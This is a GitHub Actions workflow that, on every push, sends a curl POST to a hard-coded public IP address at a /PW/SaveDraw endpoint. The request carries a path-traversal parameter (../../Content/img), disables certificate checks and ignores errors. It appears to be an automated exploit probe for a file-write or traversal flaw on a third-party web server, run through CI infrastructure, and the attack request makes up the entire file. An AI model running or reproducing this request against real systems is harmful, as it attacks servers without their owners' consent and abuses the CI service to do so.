name: autoAction
on: [push]
jobs:
  Test-GitHub-Actions:
    runs-on: ubuntu-latest
    steps:
      - name: curl
        continue-on-error: true
        run: |
          echo -e '\n-------------------------------------------------\n'
          echo -e '\nhttps://101.132.174.96:8089/PW/SaveDraw?path=../../Content/img&idx=1.txt\n'
          curl -i -s -k --compressed -m 10 -X $'POST' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Content-Type: application/x-www-form-urlencoded' -d $'' $'https://101.132.174.96:8089/PW/SaveDraw?path=../../Content/img&idx=1.txt'
          echo -e '\n-------------------------------------------------\n'
